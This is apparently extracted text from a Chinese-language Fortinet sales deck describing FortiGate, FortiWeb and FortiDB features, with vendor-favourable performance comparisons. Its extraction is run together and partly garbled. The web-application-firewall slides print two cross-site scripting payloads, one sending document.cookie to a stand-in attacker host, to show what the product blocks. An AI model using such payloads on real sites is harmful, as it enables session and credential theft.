(網(wǎng)絡(luò)處理器)高速包轉(zhuǎn)發(fā)線速防火墻IPSecVPNNAT防DoS攻擊流量整形支持多種網(wǎng)絡(luò)協(xié)議的病毒過(guò)濾HTTP、FTPSMTP、POP3、IMAPIM、NNTP、CIFS支持協(xié)議使用非標(biāo)準(zhǔn)端口可對(duì)SSL加密流量進(jìn)行病毒過(guò)濾攔截客戶機(jī)和服務(wù)器之間的通信攔截SSL握手時(shí)傳輸?shù)暮戏荑€，并進(jìn)行替換。以客戶機(jī)身份與服務(wù)器通信以服務(wù)器身份與客戶機(jī)通信支持HTTPS、SMTPS、POP3S、IMAPS病毒檢測(cè)方式基于病毒特征目前能檢測(cè)的病毒種類為100萬(wàn)種以上支持多級(jí)病毒庫(kù)支持流掃描方式完整覆蓋Wildlist病毒庫(kù)每天4次更新病毒庫(kù)宏病毒檢測(cè)基于病毒行為啟發(fā)式掃描壓縮文件掃描支持多種壓縮格式100層壓縮性能與安全的平衡可根據(jù)安全級(jí)別和性能需求，選擇4種不同級(jí)別的病毒庫(kù)。權(quán)威的防病毒認(rèn)證ICSA防病毒認(rèn)證VB100防病毒認(rèn)證FortiGuard更新服務(wù)FortiGuard全球分布式服務(wù)器-自動(dòng)地實(shí)現(xiàn)病毒庫(kù)升級(jí)，可以在10分鐘內(nèi)到達(dá)所有的FortiGate設(shè)備-自動(dòng)、手動(dòng)、推送式更新-支持在線及離線方式更新-每天4次更新病毒庫(kù)本土化服務(wù)（北京研發(fā)中心，200+工程師）FortiGuard中心

網(wǎng)站和郵件公告點(diǎn)業(yè)界領(lǐng)先的病毒庫(kù)更新速度文件大小過(guò)濾超大文件過(guò)濾可選擇處理方式–通過(guò)或阻斷文件類型過(guò)濾文件名*.exe等文件類型可執(zhí)行文件等（可防止修改文件擴(kuò)展名逃避檢查）間諜軟件/惡意軟件過(guò)濾病毒攔截提示報(bào)警蠕蟲(chóng)病毒防御-IPS病毒進(jìn)入內(nèi)網(wǎng)后往往不再以文件形式通過(guò)Internet應(yīng)用協(xié)議傳播可通過(guò)IPS方式阻擋蠕蟲(chóng)病毒的傳播防病毒與IPS的界限越來(lái)越模糊蠕蟲(chóng)病毒防御–會(huì)話監(jiān)視蠕蟲(chóng)病毒防御–會(huì)話排名蠕蟲(chóng)病毒防御-會(huì)話限制會(huì)話限制TCPUDPICMP防御蠕蟲(chóng)病毒產(chǎn)生的DoS病毒傳播媒介防御-惡意網(wǎng)頁(yè)及垃圾郵件降低惡意網(wǎng)頁(yè)和垃圾郵件傳播病毒的風(fēng)險(xiǎn)FortiGuard分類過(guò)濾76類，5000多萬(wàn)個(gè)網(wǎng)站實(shí)時(shí)更新數(shù)據(jù)庫(kù)URL過(guò)濾黑白名單Email地址及IP地址過(guò)濾關(guān)鍵字過(guò)濾支持多種語(yǔ)言腳本過(guò)濾ActiveXJavaAppletCookies隔離病毒及入侵者隔離IP地址隔離IP組合隔離源接口定時(shí)自動(dòng)釋放手工釋放77安全模塊:IPS/NAC隔離攻擊者支持DOS攻擊防御和會(huì)話控制IPS特征庫(kù)支持3000攻擊特征,24X7升級(jí)服務(wù)自動(dòng)隔離攻擊者源地址、源及目的地址、來(lái)源接口防止之后可能的持續(xù)攻擊徹底阻斷，而非僅僅檢測(cè)到的端口可以設(shè)置隔離時(shí)間互連網(wǎng)公共網(wǎng)絡(luò)資源公共網(wǎng)絡(luò)個(gè)體企業(yè)網(wǎng)絡(luò)資源

01010101010101010010111011

0101010101010101001011101101010101010101010101010101010101078安全模塊:網(wǎng)頁(yè)內(nèi)容過(guò)濾FortiGuardweb過(guò)濾庫(kù)；82個(gè)類別控制；超過(guò)4000萬(wàn)個(gè)URL；實(shí)時(shí)數(shù)據(jù)庫(kù)更新79安全模塊:網(wǎng)頁(yè)的過(guò)濾應(yīng)用網(wǎng)絡(luò)訪問(wèn)的內(nèi)容控制支持WEB內(nèi)容關(guān)鍵字過(guò)濾屏蔽具有政治或敏感的網(wǎng)頁(yè)內(nèi)容BBS論壇內(nèi)容控制

互連網(wǎng)公共網(wǎng)絡(luò)資源公共網(wǎng)絡(luò)個(gè)體企業(yè)網(wǎng)絡(luò)資源網(wǎng)頁(yè)/BBS論壇80安全模塊:垃圾郵件防御應(yīng)用互連網(wǎng)公共郵件資源公共網(wǎng)絡(luò)個(gè)體企業(yè)網(wǎng)絡(luò)資源郵件傳輸81安全模塊:

VPN數(shù)據(jù)安全應(yīng)用分支企業(yè)間互連IPSecVPNGRE通道移動(dòng)用戶訪問(wèn)IPSecSSLPPTPL2TP

分支企業(yè)

互連網(wǎng)分支企業(yè)中心企業(yè)互連網(wǎng)加密通道加密通道分支/中心企業(yè)82SSLVPN應(yīng)用ClientSTOP!用戶訪問(wèn)服務(wù)器資源時(shí)，客戶端到網(wǎng)關(guān)的數(shù)據(jù)將被加密傳輸，然后進(jìn)行認(rèn)證，輸入正確的用戶名密碼才可以繼續(xù)訪問(wèn)管理員進(jìn)行服務(wù)器管理員工訪問(wèn)辦公系統(tǒng)合作伙伴訪問(wèn)相應(yīng)資源對(duì)不同用戶設(shè)置不同的訪問(wèn)權(quán)限支持SSL加/解密加速支持認(rèn)證方式本地、Radius、LDAP、x.509數(shù)字證書(shū)認(rèn)證、WindowsADSSL加密83SSLVPN登錄界面定制歡迎語(yǔ)界面風(fēng)格組件選擇功能選擇終端檢測(cè)虛擬桌面84廣域網(wǎng)傳輸優(yōu)化應(yīng)用Internet/WANHTTPCIFSHTTP/CIFS數(shù)據(jù)請(qǐng)求本地存儲(chǔ)文件副本HTTPCIFSH100001111H2DictionaryH1=01010101H2=11110000DictionaryH1=01010101H2=11110000WAN優(yōu)化的目的：通過(guò)減少跨廣域網(wǎng)應(yīng)用的通信及數(shù)據(jù)傳輸?shù)臄?shù)量，提高網(wǎng)絡(luò)性能增進(jìn)應(yīng)用的性能,提高工作效率改善帶寬的效率,支持更多的用戶和應(yīng)用分支企業(yè)資源互訪的重要特性85Web網(wǎng)際緩存應(yīng)用WebServerClientHTTPWCCPHTTPWeb緩存技術(shù)可以有效地降低Internet網(wǎng)絡(luò)流量節(jié)約昂貴的廣域網(wǎng)鏈路費(fèi)用提高用戶訪問(wèn)速度支持WCCP協(xié)議和外部緩沖設(shè)備

86安全模塊:應(yīng)用控制互連網(wǎng)企業(yè)網(wǎng)絡(luò)資源IM聊天P2P傳輸公共網(wǎng)絡(luò)資源87FortiGateUTM安全網(wǎng)關(guān)系列88FortiGate50B-620B中低端產(chǎn)品系列AV=httpthroughput產(chǎn)品型號(hào)防火墻VPN策略數(shù)并發(fā)會(huì)話新建會(huì)話VPN通道FG50B50M45M50025,000200020FG60C1Gbps70M500080,0003000500FG-80C350M80M2,000100,0005000200FG-110C500M/1G100M4,000600,000150001,500FG-310B8G/12G6G/9G8,0001,000,000250003,000FG-620B20G/24G12G/15G8,0001,000,0002800020,000FortiGate-50B–FortiGate-110C89FortiGate1240B-2950B中高端產(chǎn)品系列Performanceresultsdisplayedasbase/fullAMCexpandedusingUDPlargepacketsizesAV=httpapplicationthroughput型號(hào)防火墻會(huì)話VPN新建會(huì)話策略數(shù)

通道FG-1240B40Gbps2000,00024G100000100,00020,000FG-3040B40Gbps4000,00016G100000100,00064,000FG-3950B120Gbps10,000,00048G175000100,00064,00090支持各種Internet接入方式未來(lái)的無(wú)線網(wǎng)絡(luò)區(qū)域經(jīng)理移動(dòng)PC信用卡

Web訂購(gòu)自助機(jī)無(wú)線的銷售點(diǎn)

3G91FortiGate-100系列FortiGate-110C基于FortiASICCP的安全加速2個(gè)10/100/1000WAN接口8個(gè)10/100內(nèi)置交換接口1個(gè)控制接口2個(gè)USB接口1U高度桌面式設(shè)備配有19”機(jī)架安裝工具性能500Mbps防火墻100MbpsIPSecVPN65Mbps防病毒200MbpsIPSFortiGate-111C內(nèi)置64GSSD硬盤(pán)（支持WAN優(yōu)化）92FortiGate-200BFortiGate-200B基于FortiASICCP/NP的安全加速4x標(biāo)準(zhǔn)10/100/1000端口4x加速10/100/1000端口8x標(biāo)準(zhǔn)10/100端口1xFSM存儲(chǔ)插槽(標(biāo)配64GSSD)1個(gè)控制接口2個(gè)USB接口1U高度性能防火墻：4GbpsIPSecVPN：3Gbps病毒檢測(cè)：100Mbps新建會(huì)話：20K并發(fā)會(huì)話：800K93FortiGate-310BFirewall性能比較Notice:防火墻性能是基于平均包大小512字節(jié)情況下測(cè)試的結(jié)果

很多廠家在發(fā)布其產(chǎn)品的性能指標(biāo)是都不透露測(cè)試時(shí)的包大小。94FortiGate-310B產(chǎn)品對(duì)比*AV性能測(cè)試基于數(shù)據(jù)流技術(shù),不能緩沖和還原文件FortinetJuniperJuniperCiscoCiscoSonicWallFortiGate-310BSRX-650SSG-550MASA5520

w/Anti-XASA5540NSA5000性能

防火墻吞吐量–平均包大小(512byte)(wAMC)

8Gbps

(12Gbps+AMC)7Gbps1Gbps450Mbps650Mbps1.8Gbps防火墻吞吐量–小包(64byte)(+AMC模塊)

8Gbps

(12Gbps)460Mbps300M163M256MUnknownVPN吞吐量-3DES

(+AMC模塊)

6Gbps

(9Gbps)1.5Gbps300Mbps225Mbps325Mbps1.1GbpsIPS吞吐量

800Mbps900MbpsUnknown225-375Mbps(AIP-SSM-10/20)450Mbps(AIP-SSM-20)

500MbpsIPSecVPN通道數(shù)3,0001000（接口模式300）75050002,500并發(fā)會(huì)話數(shù)1,000,000500,000128,000280,000400,000600,000每秒新建會(huì)話30,0003,50001500012,00025,0008,500策略8,000

4000UnknownUnknownUnknown硬件配置基本10/100/1000端口1044446模塊插槽166個(gè)PIM1N/AN/A產(chǎn)品型號(hào)95FortiGate-300系列FortiGate-310B8×1000M電口（小包線速）2×1000M電口（非小包線速）1×單寬AMC插槽2×USB支持RPS冗余電源吞吐量8-12Gbps防火墻（小包）6-9GbpsIPSecVPN（小包）160Mbps防病毒800MbpsIPSAMC擴(kuò)展模塊FortiGate-310B-DC直流電源版本FortiGate-311B2×FSM擴(kuò)展槽內(nèi)置64GSSD硬盤(pán)內(nèi)置冗余電源96FortiGate-620B硬件16個(gè)FortiASIC網(wǎng)絡(luò)處理器(NP)加速接口4個(gè)非NP加速銅口1個(gè)單寬AMC插槽2個(gè)USB接口支持RPS冗余電源性能16-20Gbps防火墻（小包）12-15GbpsIPSec（小包）250Mbps防病毒1GbpsIPS97FortiGate-620B防火墻性能比較FortiGate-110C防火墻性能是基于平均512字節(jié)數(shù)據(jù)包得出許多競(jìng)爭(zhēng)對(duì)手對(duì)公布的性能指標(biāo)沒(méi)有數(shù)據(jù)包字節(jié)數(shù)的數(shù)據(jù).98FortiGate-620B產(chǎn)品比較*防病毒性能基于流防病毒掃描Fortinet

FortiGate-620BJuniper

SSG-SRX650ISG2000Cisco

ASA5550

w/Anti-XCheckPoint

UTM-13070性能

防火墻吞吐量-平均包長(zhǎng)(512byte)(配置AMC)

16Gbps

(20Gbps)7Gbps4Gbps1.2Gbps4.5Gbps防火墻吞吐量–小包長(zhǎng)(64byte)(配置AMC)

16Gbps

(20Gbps)460Mbps2Gbps沒(méi)有公布沒(méi)有公布IPSecVPN吞吐量-(配置AMC)

12Gbps

(15Gbps)1.5Gbps2Gbps425Mbps1.1GbpsIPS吞吐量1Gbps900MbpsN/A225-325Mbps沒(méi)有公布專用IPSecVPN通道數(shù)20,00010,0005,000沒(méi)有公布并發(fā)會(huì)話1000,000500,000100,0000650,0001,100,000新建會(huì)話每秒40,0003,500023,00036,000沒(méi)有公布策略數(shù)100,000

30000沒(méi)有公布沒(méi)有公布硬件配置

固定10/100/1000Port2040-8810模塊插槽可擴(kuò)展4個(gè)1G光口60-16N/AN/A99FortiGate-1240B14x加速10/100/1000端口24x加速SFP端口2x標(biāo)準(zhǔn)10/100/1000端口1x單寬AMC插槽6xFSM存儲(chǔ)插槽(單獨(dú)訂購(gòu)FSM-06464GSSD硬盤(pán))1xUSB1xconsoleport防火墻-40GbpsIPSECVPN-24Gbps病毒檢測(cè)-500Mbps新建會(huì)話

-

15萬(wàn)

并發(fā)會(huì)話-

200萬(wàn)最大VDOM:25支持軟件RAID0/1100FortiGate-1240B性能比較項(xiàng)目FG1240BSRX3400NS5200ASA5580-2010/100/1000安全接口

(銅)28N/A2個(gè)，

一個(gè)ASA5580-4GE-CU可以增加4個(gè)接口1Gb安全接口(光纖/銅纜)384+模塊擴(kuò)展0-8一個(gè)ASA5580-4GE-FI可以增加4GESRLC10Gb安全接口(光纖)N/A0-20-20-12虛擬防火墻25N/A0-5002/50硬盤(pán)/CompactFlash可選384GSSD硬盤(pán)N/A128/512MN/A并發(fā)會(huì)話2M1M1M1M新建會(huì)話/秒100K80K-175K22,00090,000防火墻吞吐量40Gbps10-20Gbps4-10Gbps5GbpsIPS性能4Gbps6Gbps未公布不支持VPN168-位

3DES吞吐量24Gbps6G4-5Gbps1GbpsSSLVPNPeers

15000不支持不支持10,000IPSecVPN通道數(shù)64,00010,00025,00010,000策略數(shù)100,00040,00040,000N/A

FortiGate-3040B101FortiGate-3040B(前面板)FortiGate-3040B(后面板)接口規(guī)范線速10-GbESFP+接口8個(gè)線速

1-GbESFP接口10個(gè)10/100/1000管理接口2個(gè)10G光收發(fā)器2SRSFP+本地64G存儲(chǔ)模塊1個(gè)（可擴(kuò)展到4個(gè)）

性能規(guī)范

最大網(wǎng)絡(luò)層延遲8.5us防火墻性能40Gbps（64-1518字節(jié)）并發(fā)會(huì)話數(shù)500萬(wàn)新建會(huì)話數(shù)10萬(wàn)

IPSECAES性能16Gbps策略數(shù)10萬(wàn)FortiGate3950B

102FortiGate-3950BFMC-XD2萬(wàn)兆接口模塊FMC-XG2IPS加速模塊接口規(guī)范線速10-GbESFP+接口2個(gè)（可擴(kuò)展到12個(gè)）線速

1-GbESFP接口4個(gè)（可擴(kuò)展到100個(gè)）10/100/1000管理接口2個(gè)10G光收發(fā)器2SRSFP+性能規(guī)范

最大網(wǎng)絡(luò)層延遲8.5us防火墻性能120Gbps（64-1518字節(jié)）并發(fā)會(huì)話數(shù)1000萬(wàn)新建會(huì)話數(shù)15萬(wàn)

IPSECAES性能48Gbps策略數(shù)10萬(wàn)電源雙交流電源功耗507WFMC-C2020x10/100/1000M接口卡FMC-F2020x1GSFP接口卡1033040B競(jìng)爭(zhēng)比較FortiGate3040BCiscoASA5580-40CheckPointPower-111085JuniperSRX3600CiscoASA5585-X-SSP60防火墻吞吐40Gbps20Gbps25Gbps30Gbps35Gbps并發(fā)會(huì)話4M2M1.2M2.25M2M每秒新建會(huì)話100K150KN/A175k350kIPSec性能16Gbps1Gbps4.5Gbps10Gbps5GbpsIPS性能5GbpsUDP1.6GbpsHTTPNo15Gbps10Gbps10G病毒掃描1.2GbpsNoN/ANoNotSupportedWAN優(yōu)化FSM256G存儲(chǔ)NoNoNoNotSupported虛擬域YesUpto50N/AN/A50接口配置固定8x10GigSFP+,10x1GSFP接口2x10/100/1000M管理口，6個(gè)接口槽（可配4x1G,2x10G接口卡)

18x10/100/1000M,4x10G8x10/100/1000M接口，4個(gè)SFP1G,6個(gè)IOC接口槽（可配2×10G，16x1G接口卡）

12x10/100/1000M,8x10GigabitSFP+

103104集成交換矩陣ISF特點(diǎn)獨(dú)特可擴(kuò)展的數(shù)據(jù)包轉(zhuǎn)發(fā)和安全處理結(jié)構(gòu)利用網(wǎng)絡(luò)加速模塊FortiASIC-NP4和IPS加速模塊–SP2實(shí)現(xiàn)數(shù)據(jù)安全處理FMC安全處理卡通過(guò)ISF內(nèi)部交換矩陣對(duì)任意接口間的通信進(jìn)行加速全網(wǎng)狀的任意接口通信都可以通過(guò)ISF連接到FMC進(jìn)行數(shù)據(jù)加速

104105高端萬(wàn)兆防火墻競(jìng)爭(zhēng)比較FortiGate3950B思科ASA5580-40JuniperSRX3600Junos10.1JuniperSRX5600Juos10.1JuniperSRX5800Juos10.1H3CSecpathF5000-A5華賽8080E/8160E防火墻性能20-120G20Gbps10-30Gbps10-60G(4SPC)10-120G(8SPC)40Gbps40/80GbpsPPS包轉(zhuǎn)發(fā)率178M4M6M7M(4SPC)15M(8SPC)N/A8-32M（4業(yè)務(wù)卡）/8-64M（8業(yè)務(wù)卡）并發(fā)會(huì)話10M2M1-2.25M9M(4SPC)10M(8SPC)4M4-16M(4業(yè)務(wù)卡）/4-32M(8業(yè)務(wù)卡)新建會(huì)話175,000（建立關(guān)閉）150，00050,000-175,000350,000(4SPC),只建立）350,000(4SPC),只建立）500,000250k-1M（4業(yè)務(wù)卡）/250k-2M(8業(yè)務(wù)卡)(只建立)IPSec性能8-48G1Gbps10Gbps15G(4SPC)30G(4SPC)N/A4-16G（4業(yè)務(wù)卡）4-32G(8業(yè)務(wù)卡）

IPS性能1.5G-10G(FMC卡)不支持10Gbps15G(4SPC)30G(4SPC)N/AN/A病毒掃描1.5Gbps（代理模式)不支持不支持不支持不支持不支持不支持虛擬域10-2500-50256（SecurityZones)256（SecurityZones)512（SecurityZones)5121024接口配置選擇2x10G,4xGigE,5xFMC槽位（可配2x10G接口卡）2x10/100/1000M管理口，6個(gè)接口槽（可配4x1G,2x10G接口卡)8x10/100/1000M接口，4個(gè)SFP1G,6個(gè)IOC接口槽（可配2×10G，16x1G接口卡）5個(gè)/接口IOC插槽，

（可配16×1G卡，40x1G卡，4x10G接口卡）11個(gè)接口IOC插槽，

（可配16×1G卡，40x1G卡，4x10G接口卡）4G個(gè)接口槽（12xGE(8電＋4光)卡,或者2x10G卡）

8個(gè)/16個(gè)擴(kuò)展槽（可配5xGE,10xGE,,24xGE，1x10GE，POS)10G滿配接口12x10G12x10G12X10G20x10G44x10G8x10G8x10GFG5000ATCA集群式安全平臺(tái)性能線性擴(kuò)展單卡吞吐量20G最大吞吐量160G并發(fā)會(huì)話8000萬(wàn)新建會(huì)話80萬(wàn)FortiGate-5060新安全平臺(tái)1078x加速10GESFP+端口2x標(biāo)準(zhǔn)10/100/1000端口內(nèi)置64GBSSD1xUSB&1xconsole防火墻

-40Gbps（小包）

IPSECVPN-17Gbps病毒檢測(cè)–

1.5Gbps新建會(huì)話

–10萬(wàn)

并發(fā)會(huì)話-

1100萬(wàn)最大VDOM-2505000萬(wàn)并發(fā)會(huì)話50萬(wàn)新建會(huì)話7.5G病毒檢測(cè)FortiSwitch-5003B負(fù)載均衡卡5001B安全處理卡108競(jìng)爭(zhēng)分析：硬件平臺(tái)技術(shù)比較廠商描述技術(shù)特點(diǎn)30B/wifi30B,50B/HD,Wifi50B,80C/CM,110C/HD,310B,620B,3016B,3600A,3810A,5020,5050,5140

ASIC-NP+CP專用硬件加速內(nèi)容層和網(wǎng)絡(luò)層SSG5,20,140,320,350,520,550SRX210,240,650,3400,3600,5400,5800無(wú)加速技術(shù)ASA5505,5510,5520,5540,5550,5580無(wú)加速技術(shù)U200S,U200M,U200A無(wú)加速技術(shù)109競(jìng)爭(zhēng)分析：安全虛擬化能力安全功能備注防火墻VPNIPS病毒W(wǎng)eb過(guò)濾垃圾郵件各項(xiàng)功能均支持虛擬化-VDOMVirtualSystems(VSYS)UTM功能不支持虛擬化VirtualSystems(VSYS)UTM功能不支持虛擬化VirtualSystems(VSYS)UTM功能不支持虛擬化110競(jìng)爭(zhēng)分析：集中管理能力安全功能備注防火墻VPNIPS病毒W(wǎng)eb過(guò)濾垃圾郵件唯一提供全功能集中管理能力的廠商需要第三方管理平臺(tái)來(lái)管理防病毒、Web過(guò)濾和反垃圾郵件需要第三方管理平臺(tái)來(lái)管理防病毒、Web過(guò)濾和反垃圾郵件需要第三方管理平臺(tái)來(lái)管理防病毒、Web過(guò)濾和反垃圾郵件111競(jìng)爭(zhēng)分析：業(yè)界認(rèn)證安全功能備注FWVPNIPSAVICSAV4.1,EAL4+ICSAV1.2+V2.0(SSL)Yes+NSSYesFortiGate擁有業(yè)界最多的ICSA認(rèn)證，唯一獲得沒(méi)有獲得的NSS測(cè)試機(jī)構(gòu)的UTM認(rèn)證。ICSAV4.0,EAL4+YesAV認(rèn)證是TrendMicro的ICSAV4.0,EAL4+ICSAV1.2YesAV認(rèn)證是TrendMicro的112競(jìng)爭(zhēng)分析：安全服務(wù)入侵防御反病毒、反間諜軟件Web過(guò)濾反垃圾郵件應(yīng)用控制FortiGuard服務(wù)廠家自有技術(shù)OEM/第三方合作X-UTM需要完善的內(nèi)容防御功能和持續(xù)統(tǒng)一的安全服務(wù)KaperskySurfControlJuniperSymantectrendmicroironportCiscoironport第三方H3C113FortiWeb

應(yīng)用防火墻Web應(yīng)用是什么?Web應(yīng)用是公開(kāi)的、面對(duì)internet的應(yīng)用使用標(biāo)準(zhǔn)的瀏覽器訪問(wèn)，提供Web郵件、在線零售、在線拍賣、wikis以及許多其它功能為企業(yè)提供電子商務(wù)及商業(yè)推動(dòng)工具

Web應(yīng)用的編寫(xiě)是為了高效的傳輸內(nèi)容在多數(shù)情況下，Web應(yīng)用的安全性不是開(kāi)發(fā)人員優(yōu)先考慮的部分開(kāi)放的應(yīng)用有可能會(huì)暴露敏感信息攻擊由簡(jiǎn)單的破壞逐步轉(zhuǎn)變?yōu)樾庞每ê推渌鼈€(gè)人身份信息竊取銀行Web服務(wù)器數(shù)據(jù)中心113數(shù)據(jù)庫(kù)服務(wù)器前端Web服務(wù)器業(yè)務(wù)數(shù)據(jù)中心邊緣跨站腳本/釣魚(yú)攻擊SQL注入，執(zhí)行命令弱口令，暴力破解數(shù)據(jù)與審計(jì)日志竄改 溢出攻擊，權(quán)限提升114安恒機(jī)密.|114跨站攻擊獲取COOKIE利用腳本加載一個(gè)JS文件，動(dòng)態(tài)創(chuàng)建一個(gè)script標(biāo)記：<TABLEBACKGROUND=javascript:s=document.createElement("script");s.src="/xss.js";document.body.appendChild(s);>

當(dāng)用戶瀏覽貼子時(shí)，用戶瀏覽器將自動(dòng)執(zhí)行上的xss.js腳本利用JS文件指向其它網(wǎng)站當(dāng)用戶瀏覽貼子時(shí)，用戶瀏覽器將跳轉(zhuǎn)到另一頁(yè)面(如虛假登錄頁(yè)面)115Web應(yīng)用防火墻進(jìn)行Web應(yīng)用層分析，透徹理解具體應(yīng)用并攔截滲透性威脅

傳統(tǒng)防火墻檢測(cè)網(wǎng)絡(luò)攻擊檢查IP和端口，不能識(shí)別應(yīng)用類型IPS產(chǎn)品只能檢測(cè)已知的攻擊類型

逃避特殊檢測(cè)非常容易，不能對(duì)SSL流量進(jìn)行保護(hù)，不能識(shí)別應(yīng)用類型不能識(shí)別用戶，誤判率高115網(wǎng)絡(luò)訪問(wèn)(OSI1–3層)協(xié)議(OSI4–7層)網(wǎng)絡(luò)層應(yīng)用層網(wǎng)絡(luò)防火墻IPS及深度包檢測(cè)防火墻Web應(yīng)用防火墻FortiWeb

Web應(yīng)用防火墻的特點(diǎn)116手工實(shí)現(xiàn)應(yīng)用安全配置？管理員需要手動(dòng)指定：每一個(gè)URL、目錄、參數(shù)、字段長(zhǎng)度和類型。動(dòng)態(tài)內(nèi)容、JavaScript、XML等的正則表達(dá)式不斷的升級(jí)白名單高誤判率–不匹配白名單的流量將被阻止

116117FortiWeb–Web應(yīng)用防火墻117協(xié)議規(guī)范驗(yàn)證數(shù)據(jù)泄漏防護(hù)自學(xué)習(xí)和驗(yàn)證規(guī)則應(yīng)用程序攻擊簽名庫(kù)身份驗(yàn)證策略設(shè)備名稱機(jī)架式設(shè)備HTTP事務(wù)處理/秒吞吐量本地存儲(chǔ)FortiWeb-400B1U

機(jī)架設(shè)備10,000100Mb/秒0.5TB標(biāo)配FortiWeb-1000C1U

機(jī)架設(shè)備27,000500Mb/秒1TB標(biāo)配，2TB可選FortiWeb-3000C2U

機(jī)架設(shè)備40，0001Gb/秒2TB標(biāo)配，4TB可選ICSAWeb應(yīng)用防火墻認(rèn)證119在線透明橋模式方便部署，全透明或者傍路支持在線阻擋攻擊反向代理模式

支持請(qǐng)求和服務(wù)器回應(yīng)的內(nèi)容改寫(xiě)完全支持HTTPS內(nèi)容安全掃描支持HTTPS應(yīng)用優(yōu)化流量負(fù)載均衡旁路部署–

鏡像接口零網(wǎng)絡(luò)延遲通過(guò)TCPreset阻擋攻擊用于最初產(chǎn)品評(píng)估,非侵入式網(wǎng)絡(luò)部署

FortiWeb靈活的部署方式

Web業(yè)務(wù)應(yīng)用系統(tǒng)網(wǎng)銀

門(mén)戶FortiWeb在線部署FortiWeb傍路部署120邏輯規(guī)則自學(xué)習(xí)功能根據(jù)自學(xué)習(xí)結(jié)果，自動(dòng)生成配置學(xué)習(xí)到的網(wǎng)站結(jié)構(gòu)網(wǎng)頁(yè)表單各項(xiàng)參數(shù)學(xué)習(xí)被保護(hù)應(yīng)用程序的結(jié)構(gòu)URLs參數(shù)已知的行為分析訪問(wèn)攻擊提供自動(dòng)生成規(guī)則可輸出為PDF文件121Web安全簽名庫(kù)技術(shù)由全球FortiGuard云安全網(wǎng)絡(luò)提供服務(wù)，發(fā)現(xiàn)漏洞后，自動(dòng)更新簽名庫(kù)規(guī)則，維護(hù)簡(jiǎn)單，內(nèi)置6000條HTTP訪問(wèn)規(guī)則，自動(dòng)匹配應(yīng)用邏輯算法,全面檢測(cè)web訪問(wèn)應(yīng)用數(shù)據(jù),動(dòng)態(tài)安全防御體系<SCRIPT>Document.location=‘http://attackerhost.example/cg-bin/

getcookie.cgi?’+document.cookie</SCRIPT>122應(yīng)用參數(shù)邏輯規(guī)則檢測(cè)FortWEB可對(duì)受保護(hù)的WEB站點(diǎn)進(jìn)行URL級(jí)別控制，針對(duì)各種頁(yè)面定制個(gè)性化規(guī)則，支持條自定義頁(yè)面規(guī)則5000-8000網(wǎng)頁(yè)上未加限制的字符輸入框，容易受到腳本及注入攻擊123防御暴力破解FortWEB可以針對(duì)指定網(wǎng)頁(yè)的訪問(wèn)頻率，超過(guò)閾值將被阻止，有效的防止?jié)B透者對(duì)關(guān)鍵頁(yè)面暴力破解。124網(wǎng)頁(yè)防篡改FortiWeb可以發(fā)現(xiàn)被入侵或篡改的網(wǎng)頁(yè)被篡改的網(wǎng)頁(yè)可以自動(dòng)或手動(dòng)恢復(fù)125內(nèi)置Web服務(wù)應(yīng)用掃描器方便的掃描應(yīng)用程序，發(fā)現(xiàn)Web漏洞常見(jiàn)的漏洞SQL注入、跨站攻擊及其它125有助于PCIDSS6.6合規(guī)圖形化報(bào)表126SSL安全加密FortiWeb可對(duì)原有明文HTTP流量進(jìn)行SSL加密，SSL加密密鑰支持內(nèi)置及客戶自生成證書(shū)，服務(wù)器運(yùn)行原有HTTP業(yè)務(wù)，由FortWEB“裝載”了SSL協(xié)商過(guò)，此過(guò)程FortiASICCP6

芯片進(jìn)行SSL的加/解密運(yùn)算，WebServersClientHTTPSSSLComputationPCIe

加速卡CP6可加速SSL處理板載Flash存儲(chǔ)用來(lái)嵌入系統(tǒng)系列號(hào)及數(shù)字認(rèn)證127圖形報(bào)告審計(jì)128銀行應(yīng)用案例129內(nèi)部用戶合法權(quán)限濫用權(quán)限盜用越權(quán)濫用權(quán)限分配不當(dāng)臨時(shí)帳號(hào)未及時(shí)清理備份數(shù)據(jù)缺乏保護(hù)離職員工的后門(mén)合作伙伴合法權(quán)限濫用權(quán)限盜用越權(quán)濫用后門(mén)程序DB2/SQL/Oracle/Sybase數(shù)據(jù)庫(kù)軟件數(shù)據(jù)庫(kù)平臺(tái)漏洞通訊協(xié)議漏洞弱鑒權(quán)機(jī)制日志缺失或不完整

4W：-是誰(shuí)，做了什么-什么時(shí)候，在哪里跟蹤：-登錄-數(shù)據(jù)/文件訪問(wèn)-數(shù)據(jù)/文件變化-模式變化-日志竄改-人為錯(cuò)誤-可疑的活動(dòng)-自定義事件FortiDB數(shù)據(jù)庫(kù)掃描和審計(jì)系統(tǒng)130FortinetConfidential 掃描安全隱患-提供修補(bǔ)建議

內(nèi)建最優(yōu)方案

和/或用戶自有標(biāo)準(zhǔn)

持續(xù)掃描系統(tǒng)中的每一個(gè)數(shù)據(jù)庫(kù)

漏洞掃描自動(dòng)創(chuàng)建正常訪問(wèn)行為基準(zhǔn)

不斷掃描使用者的可疑行為

可疑數(shù)據(jù)訪問(wèn)報(bào)警

模板監(jiān)控審計(jì)對(duì)用戶權(quán)限變化、對(duì)象/schema變化、數(shù)據(jù)訪問(wèn)、數(shù)據(jù)更新事件等提供完整歷史記錄

向數(shù)據(jù)庫(kù)管理員、信息安全管理員、審計(jì)員審計(jì)/法律依從性報(bào)告完善的安全掃描和日常數(shù)據(jù)審計(jì)131FortinetConfidential 關(guān)鍵特性對(duì)漏洞進(jìn)行評(píng)估，并提供業(yè)界標(biāo)準(zhǔn)修補(bǔ)建議，以加固數(shù)據(jù)庫(kù)的完整性和安全性。這項(xiàng)特性將幫助排除密碼、存取、權(quán)限、配置設(shè)定等方面的弱點(diǎn)。

自動(dòng)發(fā)現(xiàn)所有的數(shù)據(jù)庫(kù)。加速安全及法規(guī)順應(yīng)性建設(shè)。(PCI,SOX,HIPAA)集中特征及策略管理。職責(zé)劃分。易于創(chuàng)建客戶自定義特征及策略。便于識(shí)別的報(bào)表專家級(jí)修復(fù)建議分析數(shù)據(jù)庫(kù)安全趨勢(shì)支持多種數(shù)據(jù)庫(kù)

(Oracle、SQL、DB2UDB、Sybase)數(shù)據(jù)庫(kù)漏洞評(píng)估132用戶行為監(jiān)控減少系統(tǒng)數(shù)據(jù)信息泄露、攻擊、篡改的